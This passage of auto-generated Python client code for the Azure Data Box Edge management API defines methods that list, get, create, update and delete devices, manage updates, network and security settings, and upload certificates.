if raw:
header_dict = {}
client_raw_response = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices'}
def list_by_resource_group(
self, resource_group_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets all the data box edge/gateway devices in a resource group.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param expand: Specify $expand=details to populate additional fields
related to the resource or Specify $skipToken=<token> to populate the
next page in the list.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DataBoxEdgeDevice
:rtype:
~azure.mgmt.edgegateway.models.DataBoxEdgeDevicePaged[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices'}
def get(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets the properties of the data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataBoxEdgeDevice or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDevice or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataBoxEdgeDevice', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _create_or_update_initial(
self, device_name, data_box_edge_device, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(data_box_edge_device, 'DataBoxEdgeDevice')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataBoxEdgeDevice', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, device_name, data_box_edge_device, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a Data Box Edge/Gateway resource.
:param device_name: The device name.
:type device_name: str
:param data_box_edge_device: The resource object.
:type data_box_edge_device:
~azure.mgmt.edgegateway.models.DataBoxEdgeDevice
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns DataBoxEdgeDevice or
ClientRawResponse<DataBoxEdgeDevice> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
device_name=device_name,
data_box_edge_device=data_box_edge_device,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('DataBoxEdgeDevice', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _delete_initial(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
device_name=device_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def update(
self, device_name, resource_group_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Modifies a Data Box Edge/Gateway resource.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param tags: The tags attached to the Data Box Edge/Gateway resource.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataBoxEdgeDevice or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDevice or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.DataBoxEdgeDevicePatch(tags=tags)
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DataBoxEdgeDevicePatch')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataBoxEdgeDevice', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _download_updates_initial(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.download_updates.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def download_updates(
self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Downloads the updates on a data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._download_updates_initial(
device_name=device_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
download_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/downloadUpdates'}
def get_extended_information(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets additional information for the specified data box edge/gateway
device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataBoxEdgeDeviceExtendedInfo or ClientRawResponse if
raw=true
:rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDeviceExtendedInfo
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_extended_information.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataBoxEdgeDeviceExtendedInfo', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_extended_information.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/getExtendedInformation'}
def _install_updates_initial(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.install_updates.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def install_updates(
self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Installs the updates on the data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._install_updates_initial(
device_name=device_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
install_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/installUpdates'}
def get_network_settings(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets the network settings of the specified data box edge/gateway
device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NetworkSettings or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.edgegateway.models.NetworkSettings or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_network_settings.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NetworkSettings', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_network_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/networkSettings/default'}
def _scan_for_updates_initial(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.scan_for_updates.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def scan_for_updates(
self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Scans for updates on a data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._scan_for_updates_initial(
device_name=device_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
scan_for_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/scanForUpdates'}
def _create_or_update_security_settings_initial(
self, device_name, resource_group_name, device_admin_password, custom_headers=None, raw=False, **operation_config):
security_settings = models.SecuritySettings(device_admin_password=device_admin_password)
# Construct URL
url = self.create_or_update_security_settings.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(security_settings, 'SecuritySettings')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def create_or_update_security_settings(
self, device_name, resource_group_name, device_admin_password, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates the security settings on a data box edge/gateway device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param device_admin_password: Device administrator password as an
encrypted string (encrypted using RSA PKCS #1) is used to sign into
the local web UI of the device. The Actual password should have at
least 8 characters that are a combination of uppercase, lowercase,
numeric, and special characters.
:type device_admin_password:
~azure.mgmt.edgegateway.models.AsymmetricEncryptedSecret
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_security_settings_initial(
device_name=device_name,
resource_group_name=resource_group_name,
device_admin_password=device_admin_password,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_security_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/securitySettings/default/update'}
def get_update_summary(
self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets information about the availability of updates based on the last
scan of the device. It also gets information about any ongoing download
or install jobs on the device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: UpdateSummary or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.edgegateway.models.UpdateSummary or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_update_summary.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('UpdateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_update_summary.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/updateSummary/default'}
def upload_certificate(
self, device_name, resource_group_name, certificate, authentication_type=None, custom_headers=None, raw=False, **operation_config):
"""Uploads registration certificate for the device.
:param device_name: The device name.
:type device_name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param certificate: The base64 encoded certificate raw data.
:type certificate: str
:param authentication_type: The authentication type. Possible values
include: 'Invalid', 'AzureActiveDirectory'
:type authentication_type: str or
~azure.mgmt.edgegateway.models.AuthenticationType
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: UploadCertificateResponse or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.edgegateway.models.UploadCertificateResponse or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.UploadCertificateRequest(authentication_type=authentication_type, certificate=certificate)
# Construct URL
url = self.upload_certificate.metadata['url']
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
